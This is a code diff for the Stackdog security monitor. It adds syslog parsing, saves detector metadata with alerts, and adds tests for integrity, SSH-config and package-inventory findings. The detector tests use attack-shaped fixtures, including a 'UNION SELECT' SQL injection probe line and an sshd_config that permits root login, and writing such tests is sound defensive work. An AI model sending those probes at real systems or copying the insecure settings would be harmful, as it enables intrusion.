"./stackdog-logs/", + sources: Some(&log_path.to_string_lossy()), + interval: 30, + ai_provider: Some("candle"), + ai_model: None, + ai_api_url: None, + slack_webhook: None, + webhook_url: None, + smtp_host: None, + smtp_port: None, + smtp_user: None, + smtp_password: None, + email_recipients: None, + }); + config.database_url = ":memory:".into(); + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 2); + } + + #[tokio::test] + async fn test_orchestrator_reports_file_integrity_drift() { + let dir = tempfile::tempdir().unwrap(); + let monitored = dir.path().join("app.env"); + std::fs::write(&monitored, "TOKEN=first").unwrap(); + + let mut config = memory_sniff_config(); + config.integrity_paths = vec![monitored.to_string_lossy().into_owned()]; + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + orchestrator.run_once().await.unwrap(); + + std::fs::write(&monitored, "TOKEN=second").unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 1); + + let alerts = list_alerts(&orchestrator.pool, AlertFilter::default()) + .await + .unwrap(); + assert!(alerts.iter().any(|alert| { + alert + .metadata + .as_ref() + .and_then(|metadata| metadata.extra.get("detector_id").map(String::as_str)) + == Some("integrity.file-baseline") + })); + } + + #[tokio::test] + async fn test_orchestrator_reports_config_assessment_findings() { + let dir = tempfile::tempdir().unwrap(); + let sshd = dir.path().join("sshd_config"); + std::fs::write(&sshd, "PermitRootLogin yes\nPasswordAuthentication yes\n").unwrap(); + + let mut config = memory_sniff_config(); + config.config_assessment_paths = vec![sshd.to_string_lossy().into_owned()]; + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 1); + + let alerts = list_alerts(&orchestrator.pool, AlertFilter::default()) + .await + .unwrap(); + assert!(alerts.iter().any(|alert| { + alert + .metadata + .as_ref() + .and_then(|metadata| metadata.extra.get("detector_id").map(String::as_str)) + == Some("config.ssh-root-login") + })); + } + + #[tokio::test] + async fn test_orchestrator_reports_package_inventory_findings() { + let dir = tempfile::tempdir().unwrap(); + let status = dir.path().join("status"); + std::fs::write( + &status, + "Package: openssl\nVersion: 1.0.2u-1\n\nPackage: bash\nVersion: 4.3-1\n", + ) + .unwrap(); + + let mut config = memory_sniff_config(); + config.package_inventory_paths = vec![status.to_string_lossy().into_owned()]; + + let orchestrator = SniffOrchestrator::new(config).unwrap(); + let result = orchestrator.run_once().await.unwrap(); + + assert!(result.anomalies_found >= 1); + + let alerts = list_alerts(&orchestrator.pool, AlertFilter::default()) + .await + .unwrap(); + assert!(alerts.iter().any(|alert| { + alert + .metadata + .as_ref() + .and_then(|metadata| metadata.extra.get("detector_id").map(String::as_str)) + == Some("vuln.legacy-package") + })); + } + #[actix_rt::test] async fn test_apply_ip_ban_records_offense_metadata_from_anomaly() { let orchestrator = SniffOrchestrator::new(memory_sniff_config()).unwrap(); diff --git a/src/sniff/reader.rs b/src/sniff/reader.rs index 6f1c235..8029226 100644 --- a/src/sniff/reader.rs +++ b/src/sniff/reader.rs @@ -5,7 +5,7 @@ use anyhow::Result; use async_trait::async_trait; -use chrono::{DateTime, Utc}; +use chrono::{DateTime, Datelike, NaiveDateTime, Utc}; use std::collections::HashMap; use std::fs::File; use std::io::{BufRead, BufReader, Seek, SeekFrom}; @@ -82,12 +82,7 @@ impl FileLogReader { let decoded = String::from_utf8_lossy(&line); let trimmed = decoded.trim_end().to_string(); if !trimmed.is_empty() { - entries.push(LogEntry { - source_id: self.source_id.clone(), - timestamp: Utc::now(), - line: trimmed, - metadata: HashMap::from([("source_path".into(), self.path.clone())]), - }); + entries.push(parse_file_log_entry(&self.source_id, &self.path, &trimmed)); } line.clear(); } @@ -103,6 +98,85 @@ impl FileLogReader { } } +fn parse_file_log_entry(source_id: &str, source_path: &str, raw_line: &str) -> LogEntry { + let (timestamp, line, mut metadata) = parse_syslog_line(raw_line); + metadata.insert("source_path".into(), source_path.to_string()); + + LogEntry { + source_id: source_id.to_string(), + timestamp, + line, + metadata, + } +} + +fn parse_syslog_line(raw_line: &str) -> (DateTime, String, HashMap) { + parse_rfc5424_syslog(raw_line) + .or_else(|| parse_rfc3164_syslog(raw_line)) + .unwrap_or_else(|| (Utc::now(), raw_line.to_string(), HashMap::new())) +} + +fn parse_rfc5424_syslog( + raw_line: &str, +) -> Option<(DateTime, String, HashMap)> { + let line = raw_line.trim(); + let rest = line.strip_prefix('<')?; + let pri_end = rest.find('>')?; + let after_pri = &rest[pri_end + 1..]; + let fields: Vec<&str> = after_pri.splitn(8, ' ').collect(); + if fields.len() < 8 { + return None; + } + if !fields[0].chars().all(|ch| ch.is_ascii_digit()) { + return None; + } + + let timestamp = chrono::DateTime::parse_from_rfc3339(fields[1]) + .ok()? + .with_timezone(&Utc); + let host = fields[2]; + let app = fields[3]; + let message = fields[7].trim(); + + let mut metadata = HashMap::new(); + metadata.insert("syslog_host".into(), host.to_string()); + metadata.insert("syslog_app".into(), app.to_string()); + metadata.insert("syslog_format".into(), "rfc5424".into()); + + Some((timestamp, message.to_string(), metadata)) +} + +fn parse_rfc3164_syslog( + raw_line: &str, +) -> Option<(DateTime, String, HashMap)> { + if raw_line.len() < 16 { + return None; + } + + let timestamp_part = raw_line.get(..15)?; + let year = Utc::now().year(); + let naive = + NaiveDateTime::parse_from_str(&format!("{} {}", timestamp_part, year), "%b %e %H:%M:%S %Y") + .ok()?; + let timestamp = DateTime::::from_naive_utc_and_offset(naive, Utc); + + let remainder = raw_line.get(16..)?.trim_start(); + let (host, message_part) = remainder.split_once(' ')?; + let (line, program) = match message_part.split_once(": ") { + Some((program, message)) => (message.to_string(), Some(program.to_string())), + None => (message_part.to_string(), None), + }; + + let mut metadata = HashMap::new(); + metadata.insert("syslog_host".into(), host.to_string()); + metadata.insert("syslog_format".into(), "rfc3164".into()); + if let Some(program) = program { + metadata.insert("syslog_program".into(), program); + } + + Some((timestamp, line, metadata)) +} + #[async_trait] impl LogReader for FileLogReader { async fn read_new_entries(&mut self) -> Result> { @@ -435,6 +509,77 @@ mod tests { assert_eq!(entries[0].metadata.get("source_path"), Some(&path_str)); } + #[tokio::test] + async fn test_file_log_reader_parses_rfc3164_syslog_lines() { + let dir = tempfile::tempdir().unwrap(); + let path = dir.path().join("syslog.log"); + { + let mut f = File::create(&path).unwrap(); + writeln!( + f, + "Apr 7 09:30:00 host sshd[123]: Failed password for root from 192.0.2.10" + ) + .unwrap(); + } + + let mut reader = FileLogReader::new("syslog".into(), path.to_string_lossy().to_string(), 0); + let entries = reader.read_new_entries().await.unwrap(); + + assert_eq!(entries.len(), 1); + assert_eq!( + entries[0].metadata.get("syslog_format").map(String::as_str), + Some("rfc3164") + ); + assert_eq!( + entries[0].metadata.get("syslog_host").map(String::as_str), + Some("host") + ); + assert_eq!( + entries[0] + .metadata + .get("syslog_program") + .map(String::as_str), + Some("sshd[123]") + ); + assert!(entries[0].line.starts_with("Failed password for root")); + } + + #[tokio::test] + async fn test_file_log_reader_parses_rfc5424_syslog_lines() { + let dir = tempfile::tempdir().unwrap(); + let path = dir.path().join("syslog5424.log"); + { + let mut f = File::create(&path).unwrap(); + writeln!( + f, + "<34>1 2026-04-07T09:30:00Z host sshd - - - Failed password for root from 192.0.2.10" + ) + .unwrap(); + } + + let mut reader = FileLogReader::new("syslog".into(), path.to_string_lossy().to_string(), 0); + let entries = reader.read_new_entries().await.unwrap(); + + assert_eq!(entries.len(), 1); + assert_eq!( + entries[0].metadata.get("syslog_format").map(String::as_str), + Some("rfc5424") + ); + assert_eq!( + entries[0].metadata.get("syslog_host").map(String::as_str), + Some("host") + ); + assert_eq!( + entries[0].metadata.get("syslog_app").map(String::as_str), + Some("sshd") + ); + assert_eq!(entries[0].line, "Failed password for root from 192.0.2.10"); + assert_eq!( + entries[0].timestamp.to_rfc3339(), + "2026-04-07T09:30:00+00:00" + ); + } + #[test] fn test_docker_log_reader_new() { let reader = DockerLogReader::new("d-1".into(), "abc123".into()); diff --git a/src/sniff/reporter.rs b/src/sniff/reporter.rs index 192aabf..c9c62f4 100644 --- a/src/sniff/reporter.rs +++ b/src/sniff/reporter.rs @@ -6,6 +6,8 @@ use crate::alerting::alert::{Alert, AlertSeverity, AlertType}; use crate::alerting::notifications::{NotificationConfig, NotificationResult}; use crate::database::connection::DbPool; +use crate::database::models::{Alert as StoredAlert, AlertMetadata}; +use crate::database::repositories::alerts::create_alert; use crate::database::repositories::log_sources; use crate::sniff::analyzer::{AnomalySeverity, LogSummary}; use anyhow::Result; @@ -70,14 +72,39 @@ impl Reporter { anomaly.description ); - let alert = Alert::new( - AlertType::AnomalyDetected, - alert_severity, - format!( - "[Log Sniff] {} — Source: {} | Sample: {}", - anomaly.description, summary.source_id, anomaly.sample_line - ), + let message = format!( + "[Log Sniff] {} — Source: {} | Sample: {}", + anomaly.description, summary.source_id, anomaly.sample_line ); + let alert = Alert::new(AlertType::AnomalyDetected, alert_severity, message.clone()); + + if let Some(pool) = pool { + let mut metadata = AlertMetadata::default() + .with_source(summary.source_id.clone()) + .with_reason(anomaly.description.clone()); + if let Some(detector_id) = &anomaly.detector_id { + metadata + .extra + .insert("detector_id".into(), detector_id.clone()); + } + if let Some(detector_family) = &anomaly.detector_family { + metadata + .extra + .insert("detector_family".into(), detector_family.clone()); + } + if let Some(confidence) = anomaly.confidence { + metadata + .extra + .insert("detector_confidence".into(), confidence.to_string()); + } + + create_alert( + pool, + StoredAlert::new(AlertType::AnomalyDetected, alert_severity, message) + .with_metadata(metadata), + ) + .await?; + } // Route to appropriate notification channels let channels = self @@ -125,6 +152,7 @@ pub struct ReportResult { mod tests { use super::*; use crate::database::connection::{create_pool, init_database}; + use crate::database::repositories::{list_alerts, AlertFilter}; use crate::sniff::analyzer::LogAnomaly; use chrono::Utc; @@ -179,6 +207,9 @@ mod tests { description: "High error rate".into(), severity: AnomalySeverity::High, sample_line: "ERROR: connection failed".into(), + detector_id: None, + detector_family: None, + confidence: None, }]); let result = reporter.report(&summary, None).await.unwrap(); @@ -203,6 +234,37 @@ mod tests { assert_eq!(summaries[0].total_entries, 100); } + #[tokio::test] + async fn test_report_persists_detector_metadata_in_alerts() { + let pool = create_pool(":memory:").unwrap(); + init_database(&pool).unwrap(); + + let reporter = Reporter::new(NotificationConfig::default()); + let summary = make_summary(vec![LogAnomaly { + description: "Potential SQL injection probing detected".into(), + severity: AnomalySeverity::High, + sample_line: "GET /search?q=UNION%20SELECT".into(), + detector_id: Some("web.sqli-probe".into()), + detector_family: Some("Web".into()), + confidence: Some(84), + }]); + + reporter.report(&summary, Some(&pool)).await.unwrap(); + + let alerts = list_alerts(&pool, AlertFilter::default()).await.unwrap(); + assert_eq!(alerts.len(), 1); + let metadata = alerts[0].metadata.as_ref().unwrap(); + assert_eq!(metadata.source.as_deref(), Some("test-source")); + assert_eq!( + metadata.extra.get("detector_id").map(String::as_str), + Some("web.sqli-probe") + ); + assert_eq!( + metadata.extra.get("detector_family").map(String::as_str), + Some("Web") + ); + } + #[tokio::test] async fn test_report_multiple_anomalies() { let reporter = Reporter::new(NotificationConfig::default()); @@ -211,11 +273,17 @@ mod tests { description: "Error spike".into(), severity: AnomalySeverity::Critical, sample_line: "FATAL: OOM".into(), + detector_id: None, + detector_family: None, + confidence: None, }, LogAnomaly { description: "Unusual pattern".into(), severity: AnomalySeverity::Low, sample_line: "DEBUG: retry".into(), + detector_id: None, + detector_family: None, + confidence: None, }, ]); @@ -243,6 +311,9 @@ mod tests { description: "High error rate".into(), severity: AnomalySeverity::High, sample_line: "ERROR: connection failed".into(), + detector_id: None, + detector_family: None, + confidence: None, }]); let result = reporter.report(&summary, None).await.unwrap(); diff --git a/web/package.json b/web/package.json index ff62a3b..d4d59b5 100644 --- a/web/package.json +++ b/web/package.json @@ -1,7 +1,7 @@ { "name": "stackdog-web", "description": "Stackdog Security Web Dashboard", - "version": "0.2.1", + "version": "0.2.2", "scripts": { "start": "cross-env REACT_APP_VERSION=$npm_package_version webpack serve --mode development", "build": "cross-env REACT_APP_VERSION=$npm_package_version webpack --mode production",